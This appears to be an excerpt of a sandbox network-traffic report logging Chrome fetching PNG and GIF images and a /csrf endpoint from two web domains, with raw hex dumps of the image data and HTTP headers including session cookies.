                                                      2025-01-12 23:47:53 UTC3741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 d2 00 00 00 d8 08 06 00 00 00 9e 02 bd 24 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 06 78 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                      Data Ascii: PNGIHDR$pHYsxiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 18 ab b5 65 bd 2c eb 6f 34 3c 5e 82 df a8 82 00 c9 58 b6 c7 0f 50 c4 0b 22 11 1d 8e 4b 65 e4 d2 50 24 7b b7 28 d8 be 68 2a 5e 2c d4 b2 77 b0 de c8 0b 1c 6e b9 a2 3d 1c 56 00 e9 3a 4b d5 6e 94 c5 33 e9 e1 9a f6 5b 0e d9 fe e0 5f 96 a2 2d cb b3 6d db 67 85 c6 06 c6 24 6d d9 44 5b ce 33 21 44 90 ec 8d c0 5c 7f 7e b4 2a e6 40 f2 52 74 08 46 b2 e1 8e 23 09 f1 85 f4 46 2a d7 93 1b 96 79 5b 1b 91 5b 98 2a 6a 80 3c 14 1b ac 61 9c 1e 7e 59 8d 39 41 60 08 16 2f 53 51 20 19 45 8c 3f d8 f3 34 4b 91 23 76 40 62 85 7b 9e 22 a3 e5 96 8d db 60 28 5c b3 04 ba 79 bf 8a f2 46 c1 84 ad 32 89 ca ff 1e 40 b2 86 4e ba b1 6b bf b5 e6 24 91 f6 48 83 b4 c5 0b 15 40 b2 7a 50 2b 50 29 fe 0a 5f 6c 81 a4 3a 4e 5d 38 21 f2 5a 78 a8 88 90 2e 54 6f e4 a5 b2 e8 24 d9 b8 7e 1e 40 6a e1 2f
                                                      Data Ascii: e,o4<^XP"KeP${(h*^,wn=V:Kn3[_-mg$mD[3!D\~*@RtF#F*y[[*j<a~Y9A`/SQ E?4K#v@b{"`(\yF2@Nk$H@zP+P)_l:N]8!Zx.To$~@j/
                                                      2025-01-12 23:47:53 UTC1400INData Raw: eb 63 fa 3e 5f f2 44 14 83 b4 e5 7f 8e c4 3c 48 cf cd 4c d0 8d d1 f0 3e ac ad 5b 7f a4 69 2f 3d 6f 86 48 9f 64 dc 4c c7 0e ce a1 7b b4 9c c3 4d 8b 96 af a4 84 5d d7 d3 97 6b 12 cc 50 8a 0d ff a7 b5 6d 1c 7f 77 f3 bd e7 c3 bf 1b ae fa 99 76 67 3d 47 77 3e 56 d6 50 31 28 dd bb 55 31 c1 30 b6 67 fc c6 08 bf 76 7f d7 d3 dc de bf 33 cf d0 e4 19 65 f9 d1 27 0b 3e a5 9a f9 f7 9b b9 14 6f 6f ce cc c1 d4 77 c0 24 13 ac d7 5e 7b c5 84 6e f8 f0 e1 fa 73 35 6e 30 c6 8d 9b 40 3f 7d d3 85 e8 5c 51 4c df e7 0e cf 35 8c 5e 90 36 8f cd 89 79 90 d2 5f ab 66 82 34 e9 2f 83 e9 40 d6 ef f4 e5 db f6 5e 4e 63 9e da 6a 1a 77 fd 84 69 66 18 c4 21 5c 9d ba 29 c2 ed 31 8c 7b d6 df ac 85 62 5b 03 40 da fe 75 2b c7 e3 18 30 bc 6a 00 48 c7 f6 bc 1c 00 a3 b5 08 61 6c cf f8 0d e7 55 b7
                                                      Data Ascii: c>_D<HL>[i/=oHdL{M]kPmwvg=Gw>VP1(U10gv3e'>oow$^{ns5n0@?}\QL5^6y_f4/@^Ncjwif!\)1{b[@u+0jHalU


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      74192.168.2.44982620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC374OUTGET /images/dc_hot.gif?ver=1606790076 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:53 UTC354INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 1388
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:34:36 GMT
                                                      ETag: "5fc5abbc-56c"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:53 UTC1388INData Raw: 47 49 46 38 39 61 15 00 0c 00 a2 04 00 ff ff ff ff 00 00 ff 05 05 ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68
                                                      Data Ascii: GIF89a!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      75192.168.2.44982720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC625OUTGET /images_plus/index/en/footer_tindex.png?ver=1678854633 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:53 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 21119
                                                      Connection: close
                                                      Last-Modified: Wed, 15 Mar 2023 04:30:33 GMT
                                                      ETag: "641149e9-527f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:53 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 52 00 00 01 4c 08 06 00 00 00 c1 65 8d c5 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 21 49 44 41 54 78 da ec 9d 89 ad f4 36 d2 76 ed 8b 4e cc d1 38 03 07 e1 0c 1c 8d 43 f3 0f e3 47 7f a3 d1 70 a9 a7 16 8a 92 ce 01 06 e3 fb 76 37 59 ac 8d 8b 28 f2 97 5f 1e c0 6f 7f fc fe cf 1b e5 bc 4b bb 77 d2 e5 9b 75 f6 66 aa ed 8e 5f ad d7 e1 93 74 7e 6c 4b ef bf b1 39 7d ea 1d ec f6 d4 b8 04 7c be f7 d9 a7 f5 85 bf ff fc eb 57 d4 06 00 00 00 00 00 d0 e6 e7 38 79 fa fe 6f f5 2c 3c 5a df 5b 27 7e 4c 78 63 3a 63 b5 09 f0 85 fb e8 30 ab fc 1d 6d fd 96 5c ce a2 2d e3 12 72 33 3c cd af 7f 50 0f 00 00 00 00 00 80 c6 c7 b2 1a 70 9e 89 b5 fe ed
                                                      Data Ascii: PNGIHDRRLetEXtSoftwareAdobe ImageReadyqe<R!IDATx6vN8CGpv7Y(_oKwuf_t~lK9}|W8yo,<Z['~Lxc:c0m\-r3<Pp
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 7f ca f2 81 4c fd 5b e5 cb 8c 27 f5 f0 b5 a8 ef 66 f5 1d de fe a2 7a 6c 98 3d b6 95 9e 48 a9 4f 04 ac e5 64 6c 21 cc 92 4b 95 53 dd aa 93 5d 5e 95 4d 7a 9f f7 ca f3 6e 59 1a fd 2e a2 db 2a 9d af d0 91 75 65 36 4b e6 4a df 6a ad e0 1c 57 79 ce b6 89 d8 29 ab 9d bd 27 26 59 65 a9 3a ab c8 9f a3 ef f7 56 85 2d ed b0 ca 3e 2a 2f 12 43 15 4f 25 a3 ba ae c8 f9 19 65 67 e7 92 e8 b6 d5 ac 3c ac ca 31 7a b5 a1 da ae 4a 5c 8d ea ca f2 fb 4a fb 7a eb f4 e4 02 eb d3 e1 8c b1 c5 68 d2 14 e9 b3 22 79 27 ea bb de 9d 1f 99 7d dd 8a b1 61 d6 b8 ed b3 2a 20 ae e4 cd ef 25 64 b5 7d b6 e5 11 f2 74 34 9b 10 aa 8f ce 89 2b da 9a 31 68 b5 6e 61 53 fc 7f b6 a5 2f 32 69 81 b8 4d d1 c3 3d ea 7e a2 fd 2a c6 1c 99 7a b2 6c d3 7c 62 7c 3d 6d 4c 99 21 c7 cf 68 36 a6 ae 58 79 b7 e7 ad
                                                      Data Ascii: L['fzl=HOdl!KS]^MznY.*ue6KJjWy)'&Ye:V->*/CO%eg<1zJ\Jzh"y'}a* %d}t4+1hnaS/2iM=~*zl|b|=mL!h6Xy
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 05 74 8d 0d 01 9f 78 5e 5b 89 81 1a 3f 59 fd 22 3e 3a 27 9f bf 5d 0f 57 b4 7b a7 1c ba d3 41 18 ca bb ff 1e 78 22 75 52 68 ef 65 b8 33 ac 4e 5c 67 97 d9 bf c3 3d ed db bb ed 3e 23 b6 3c b7 ab 57 9f 2a fa 76 1b 13 cb 00 00 b5 e3 24 b8 d9 cc b9 62 0f e9 aa 99 6c ef 16 ee 91 1c ca ad dc f8 58 ee 69 8c 4f d4 e9 db 57 ee 3c 37 de 7b 7c 65 e7 b8 7d aa 9f 7b f2 2b d4 e4 0e 9e 48 ad d1 63 e4 28 6f 62 03 ee 1e 7f bb 1e cd 5e 21 0b 87 4d 00 c0 a3 99 bd 6f c6 2a 1e 00 00 00 78 f8 f4 66 6a c7 2d 36 ad ad 30 bd ed 31 a3 f3 e2 ad 5b 6a 66 65 8e b6 fd 1c b7 90 58 06 52 d5 b3 65 4b 1b 46 f2 ab 9f 59 75 1b b1 b9 2a bb aa 83 de 60 78 b4 3d c8 e2 13 d6 c1 f3 ac 2c c5 2e b3 3a 54 db cc e4 53 ea ea 95 63 f9 77 cf f6 b8 d9 0d e7 de 3b 61 2c be a6 96 13 89 23 af 7f 54 e4 d0 91
                                                      Data Ascii: tx^[?Y">:']W{Ax"uRhe3N\g=>#<W*v$blXiOW<7{|e}{+Hc(ob^!Mo*xfj-601[jfeXReKFYu*`x=,.:TScw;a,#T
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 6d 61 d9 8e 3f 93 21 22 e3 8a 63 9b 47 f2 59 57 87 22 ed aa 6c 63 44 c6 6c ff a9 92 a5 b2 8d 6a 0e 50 de 5f f1 c8 aa 6c 77 da 41 7f 99 f5 29 fe 56 15 5f 8a 7d b3 f5 9b b1 42 bc c2 d6 ab fc a9 ba 9e 2b fa e4 1d 26 07 57 ca 3f cb 6f d9 bb 40 ee 16 0f 19 fa a9 9a 18 29 db 1b e1 79 7c ce c6 ff 1e 0f 7c 76 00 e5 25 e2 8c 20 6f c9 75 ae 6f 26 63 e5 e4 cf 22 83 a2 47 ef e1 15 99 f2 5b eb 6a fd ae f7 12 bb 52 67 e6 0b 9b 51 ff c8 f4 1f ab 9f 64 d8 cf ba e8 61 d9 92 35 f2 8d d6 77 cf 7f ab b1 90 dd d6 55 3e 52 a1 53 6f 8e f4 c6 97 f5 90 0f a5 1f f0 ea d7 7b 00 8c 22 8b 35 0f 5f ed a3 57 e4 b6 2b fa e4 d9 d3 a6 c8 a1 0a 56 3f af ca d3 d1 be d8 92 5f 9f 1e 0f 51 fd 44 0e 9a 88 e4 5c 80 d2 49 08 e0 13 00 40 cc a3 23 74 84 9e 88 07 80 bb c2 3d 52 10 4e 86 24 47 00 20
                                                      Data Ascii: ma?!"cGYW"lcDljP_lwA)V_}B+&W?o@)y||v% ouo&c"G[jRgQda5wU>RSo{"5_W+V?_QD\I@#t=RN$G
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 6d 91 5b 59 85 b1 dc 8d a2 fa 82 67 db 94 c7 77 d4 95 ba 63 59 b3 32 2b 6c 90 11 53 5e 9f 54 26 19 9e 1c a8 5c 6e 38 f2 ff f3 2d f3 bb 1c 5a d0 ca 51 bd bf 55 7f 98 fd ed dd 02 a3 fa 84 6a 63 4f 0e 5e 91 e7 ac 3a 18 e5 7d ab 1f 5a 72 6a 65 5f 74 65 5e cd 8e 89 15 f1 10 f1 6f e5 5e 32 c5 7f 47 3e a8 c4 4a 64 8c e4 1d bb 5a f4 6b f5 e7 99 ff 64 8e 05 76 e9 e3 23 f3 8e 59 ee fa 9f ef b5 5e 48 1b bd 70 38 bb a1 7c f6 1b cb df d6 c4 ed 29 7b 76 c3 f8 ac bd 96 97 31 2d 03 1f e5 a6 73 c5 1e 19 e5 aa 09 5f d5 71 96 3d 55 b9 2d f5 79 cb cd b2 61 b6 8d 3c f5 5a da 63 95 f1 2a 1b 44 ec 31 b3 ad 9a b7 3c 39 d2 1b e3 56 1b 45 72 ae b7 9d 16 db 8d da eb f5 07 6b 99 8a 4e 2c 97 f0 46 6c ac e6 82 55 31 16 ed c7 ab 72 50 76 5f 74 75 5e cd 8e 89 ca 78 50 db ed c9 9d 1e ff
                                                      Data Ascii: m[YgwcY2+lS^T&\n8-ZQUjcO^:}Zrje_te^o^2G>JdZkdv#Y^Hp8|){v1-s_q=U-ya<Zc*D1<9VErkN,FlU1rPv_tu^xP
                                                      2025-01-12 23:47:53 UTC995INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 e1 b7 3f 7e ff a7 f5 df 77 90 57 f9 ac aa 4e b8 d6 17 22 b6 a9 f4 fd bb f8 cc 2e 72 ae 92 e3 e9 f9 03 9f 8e b7 e3 6e 7d e2 2e 36 a6 9f 04 00 2f 9f 7f 13 c8 df 7f fe f5 6b 2b b1 9c ff bd f7 5d 78 6f 67 85 3f f8 74 68 d1 1b ba 06 f2 07 6d bb 43 7b c9 4d 00 f0 56 7e 9e d2 10 12 79 bb 33 af 28 fb 5f 5d 7f ff f7 c6 95 bc 15 6d 9e e9 7a 95 bf b3 52 fb 2e 5d 5e 99 3f ee ec d3 3b e6 c6 4a 7d 7e 17 83 76 ea 07 22 ed 65 fc 00 00 ee 89 54 2b 09 7e ff 3e 6f 13 20 d9 30 08 3c fb 00 3e 81 ae 01 de ec d3 6f 8b d7 d6 58 80 dc 04 00 6f e5 13 ed 3c ac 49 b4 d5 d9 7c 13 f2 f9 33 cf 2a e5 39 b9 f7 b6 59 f4 ca ee c9
                                                      Data Ascii: w?~wWN".rn}.6/k+]xog?thmC{MV~y3(_]mzR.]^?;J}~v"eT+~>o 0<>oXo<I|3*9Y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      76192.168.2.44982920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC612OUTGET /images_plus/index/g03.png?ver=1606793402 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:53 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 13705
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 03:30:02 GMT
                                                      ETag: "5fc5b8ba-3589"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:53 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 0d 00 00 00 4f 08 03 00 00 00 c6 2b 60 e9 00 00 03 00 50 4c 54 45 00 00 00 01 01 04 03 00 01 09 01 01 06 01 01 02 03 05 06 07 08 0d 01 01 05 05 04 0c 0e 0f 09 0b 0a 0e 11 13 01 03 0b 12 05 02 08 0c 0f 12 15 17 02 07 13 05 08 0c 24 0e 07 2a 14 0c 1a 06 03 49 2e 24 54 3d 27 05 0b 1a 1c 0c 06 61 43 37 30 17 0c 07 12 24 15 19 1d 1c 12 0a 41 28 1e 13 0c 07 1a 2c 40 11 22 35 42 27 11 22 41 5d 4a 3a 25 b1 84 71 28 32 39 0e 1b 2a 49 30 1a 21 45 68 1f 39 55 60 3c 2d 71 50 45 35 24 0e 5b 47 31 59 3b 31 14 12 0f 2a 4d 6e a6 78 60 2d 38 41 1a 23 29 0c 08 05 c8 a1 93 53 33 28 d4 be b8 1e 33 4a 5a 4c 48 38 22 1c 2d 52 76 60 4f 3b 3a 29 18 30 1e 15 69 4a 3f 37 1b 11 d7 c5 b4 92 65 50 78 57 4a 20 28 2e 06 15 2d 1d
                                                      Data Ascii: PNGIHDRO+`PLTE$*I.$T='aC70$A(,@"5B'"A]J:%q(29*I0!Eh9U`<-qPE5$[G1Y;1*Mnx`-8A#)S3(3JZLH8"-Rv`O;:)0iJ?7ePxWJ (.-
                                                      2025-01-12 23:47:53 UTC4096INData Raw: a3 d5 55 9d 9d 07 cb d2 51 2b ca c0 40 81 12 14 a4 33 8b ad a4 02 c6 58 22 ad 4e a4 33 73 49 c5 cf 22 04 03 35 d8 2a 11 45 cc 55 4a 9c e5 6a 60 de 83 a6 e0 d3 68 a5 5e 0f 19 a2 b6 d4 6a b5 56 aa 5b a7 27 81 89 0d 93 be 2e 2d 9d 6d 7d 52 46 70 06 38 ec 34 54 83 33 33 c1 71 49 59 9e d9 1b 63 b5 0a 79 fb 16 67 4b 8e 07 f4 18 da b0 30 77 95 42 ee 9d 7f 38 cf 8e 2f 9f 06 0d 34 90 08 f8 11 ad bd e5 89 97 5c 34 6e 61 58 d4 55 85 24 ef db 99 5e 56 71 f9 9e 8a 42 34 9e 85 81 7d 90 59 07 a1 a2 36 03 0c ae 4e 0b 44 14 5e a4 fc 67 12 4e 4a 80 59 44 7b f2 08 d2 8c 04 8e 11 63 8b 8a ef 86 7c 88 1c 29 55 4a a5 ca d2 a9 da ca d2 29 75 ed 94 84 67 9b b4 c1 15 d9 f4 6e 53 ad 34 c6 eb 77 63 a7 c1 cd ff f2 8b 6e 5f df dc 8c 80 0d 61 5e f2 82 2c df 9a b1 d4 02 05 a9 cd 8c 8d
                                                      Data Ascii: UQ+@3X"N3sI"5*EUJj`h^jV['.-m}RFp84T33qIYcygK0wB8/4\4naXU$^VqB4}Y6ND^gNJYD{c|)UJ)ugnS4wcn_a^,
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 15 69 e5 bb 13 a3 a2 20 60 c4 67 67 b7 ea 12 d3 94 15 e1 3e 0a 36 3b 24 24 0e 54 e9 14 11 c2 f4 3d 68 0f 4d 84 cb 12 ca 8a a3 77 f4 bf 70 ef dd bb 87 d3 c0 83 c7 6c a2 25 be 90 86 f5 b3 76 85 f9 75 6f 6f d1 8f ed 32 31 26 74 62 4a 98 4e 12 31 97 ba 47 25 a4 c6 b1 cf 8b 80 84 f6 50 85 94 c1 50 87 4b c3 df 1c 03 0c 7e e3 47 57 c2 6a 85 8b 5b b0 7b 80 ef 02 44 c3 0e d2 21 00 89 85 03 36 ea f1 94 94 94 bc a7 fe 67 36 07 c1 99 61 61 64 61 d1 d3 6b 19 6f 8e 16 f5 4e 6e c9 8f 8e 0b ac cf 6f f5 89 e1 27 17 14 24 17 bc 60 68 0e eb d8 7b 5d e6 82 da 82 9c f6 b6 cc cc 4c 58 15 12 c0 54 4d 17 05 96 58 11 ad 96 32 32 42 24 92 88 38 76 88 3c 96 1a 02 f7 07 0e ae 20 92 08 30 bd 84 d5 94 7d f7 14 9c 5f 6e a0 d4 f2 f9 b1 75 2c 88 1b 28 92 22 6d bc 68 dc f3 ec 4f fa 7f ec
                                                      Data Ascii: i `gg>6;$$T=hMwpl%vuoo21&tbJN1G%PPK~GWj[{D!6g6aadakoNno'$`h{]LXTMX22B$8v< 0}_nu,("mhO
                                                      2025-01-12 23:47:53 UTC1773INData Raw: c9 df 31 89 f5 06 ba 44 8d 51 c3 c2 e4 5c 4c 22 11 9e e7 71 44 98 48 6f 31 68 0c 3c 11 4f aa ec ce ce 4e 94 ee 8c 73 75 77 03 1c b3 8d 6c 30 d4 60 7c 90 c8 e0 a0 a7 95 2f 89 18 a0 bd 9d f2 49 e9 c9 f8 d6 89 89 89 21 73 d8 8e cb 17 2f 5e 4e 1d 50 50 f8 1d 55 70 6c f9 45 28 7f 2d 3e 1d 06 4f 71 5c b2 17 68 cc 9b 0d 44 52 b2 3d 19 75 f2 24 90 06 52 06 0c 7d 29 ae d6 24 32 a0 20 91 91 59 35 0f df 6c de 5a 53 d3 5c c6 8e e0 c8 18 8c e8 a4 34 ef b4 ab f9 b7 6e 0e 37 d5 d6 d5 01 8d 9a f1 8d f3 da 20 23 bc 20 2d d4 19 bf a6 b1 87 30 ae b0 38 ac e4 9c 92 ab 8d 95 43 72 65 0a 59 0a 4c 21 84 94 c2 11 c9 c4 a2 54 ad 46 29 13 f1 04 ea a1 a8 a8 c3 d1 87 33 56 b8 b8 bb 07 7b 0c 7a 00 0e 64 ce 2e 5e 7e a8 ff 58 b2 0a 4a 1d e3 ed ae ae 0d f1 46 dd ee 09 e9 10 c3 ee 9d d4
                                                      Data Ascii: 1DQ\L"qDHo1h<ONsuwl0`|/I!s/^NPPUplE(->Oq\hDR=u$R})$2 Y5lZS\4n7 # -08CreYL!TF)3V{zd.^~XJF


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      77192.168.2.449828154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC938OUTGET /csrf HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6ImRVaTlRMTNPdGRxVUplT3ZmQmp6NUE9PSIsInZhbHVlIjoiRE04UXVzK243QTEzQ0RzRWRtNVlta215T0E5eWNiTlVRS0l4M1huaUwrM0l4QmVITzluYzhOVnhcL0V4bTU1NTZVeGdTQWdEb0JzNFwvbXoxMEJVa1pDQT09IiwibWFjIjoiZTlmNDZkMTZhODA2MWJhMjlmNGMxYTU0NjFlMDgwYjU5ODM5OTA5NTZhNWRmYzMyOTczNTRkMjZmNDVmYmY2ZSJ9; vanguard_session=eyJpdiI6InhRWDQxeDlRWHRaUHdjOXh4TzZWVkE9PSIsInZhbHVlIjoiNXFCbDZIa1lHUTljMWJCaWdwSnBcLzVCZHJnNGdCdzlmaDVZWHdkTzk4cG8xZXR2cmlMOUVcL3dQZVhmZDBzR2ZubVNLeGRwXC9mbDVaQ1k3OXF0QWZpbHc9PSIsIm1hYyI6ImMwNDVlZWU2ZjllODVlZmYyOGUzOGUyMjA5YmVhNWZkNWViNTgzNTIyM2FjZGU5ODhhNjYwNGM1NTdlYjEyMmYifQ%3D%3D
                                                      2025-01-12 23:47:53 UTC1131INHTTP/1.1 404 Not Found
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: no-cache, private
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; expires=Mon, 13-Jan-2025 01:47:53 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      Set-Cookie: vanguard_session=eyJpdiI6Ik1vMzBOMWtcL1ZTZ3ZHQ3BqREs1SFB3PT0iLCJ2YWx1ZSI6Ill0NVlqZk5SdTQ1WGVuTWtrUkdxSEV4XC9DbWYrS0k2b01PVWkxenF3d0wxWUl4bVlrZDVNUTJ2NWNUVGVPZFp6VXJCS2pWSHlhdCt0MEZLMVwvZ3ppTUE9PSIsIm1hYyI6ImZkODJkNTUwOGQyYWQ0ZWRiZjhhYWM3ODQ5ODkzNjFiYjljNTVlMTY4OTMwYTdlZWI0YTEzODdjMzNkM2M5N2IifQ%3D%3D; expires=Mon, 13-Jan-2025 01:47:53 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
